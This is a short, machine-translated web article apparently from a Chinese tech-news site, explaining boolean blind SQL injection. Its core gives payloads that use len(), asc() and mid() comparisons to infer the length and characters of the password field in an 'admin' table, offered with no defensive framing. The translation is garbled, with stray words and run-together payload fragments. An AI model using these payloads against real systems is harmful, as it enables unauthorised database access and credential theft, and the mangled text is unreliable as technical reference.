Network Security Internet Technology Development Database Servers Mobile Phone Android Software Apple Software Computer Software News IT Information

In addition to Weibo, there is also WeChat

Please pay attention

WeChat public account

Shulou

Sql Blind Grammar judgment data content

2025-02-25 Update From: SLTechnology News&Howtos shulou NAV: SLTechnology News&Howtos > Database >

Share

Shulou(Shulou.com)06/01 Report--

Today, the editor to share with you is sql blind grammar judgment data content, many people do not understand, today editors in order to let you know more about sql blind grammar, so give you a summary of the following content, let's look down. There's got to be something.

If there are no wrong numbers on the page, the blind syntax is used to judge the data content according to the page changes.

Get the data length:

And (select top 1 len (column name) from table name) > 5and (select top 1 len (password) from admin) > 16 and / error and (select top 1 len (password) from admin) > 15 shock / normal

Gets the data of the specified number of digits:

And (select top 1 asc (mid (column name, position, 1)) from table name) > 97and (select top 1 asc (mid (admin,1,1)) from admin) > 96max / judging the content of the admin field, the first ascii code value is greater than 96 normal and (select top 1 asc (mid (admin,1,1) from admin) > 97max / judging the admin field content the first ascii code value is greater than 97 error description is 97mid (string, intercepted position) Number of characters intercepted) asc () / / convert characters to ascii codes for easy comparison

After reading the appeal content, do you have a general understanding of the sql blind grammar judgment data? If you want to know more, welcome to follow the industry information channel!

Welcome to subscribe "Shulou Technology Information " to get latest news, interesting things and hot topics in the IT industry, and controls the hottest and latest Internet news, technology news and IT industry trends.

Views: 0

*The comments in the above article only represent the author's personal views and do not represent the views and positions of this website. If you have more insights, please feel free to contribute and share.

Share To

Database

Wechat

© 2024 shulou.com SLNews company. All rights reserved.

12
Report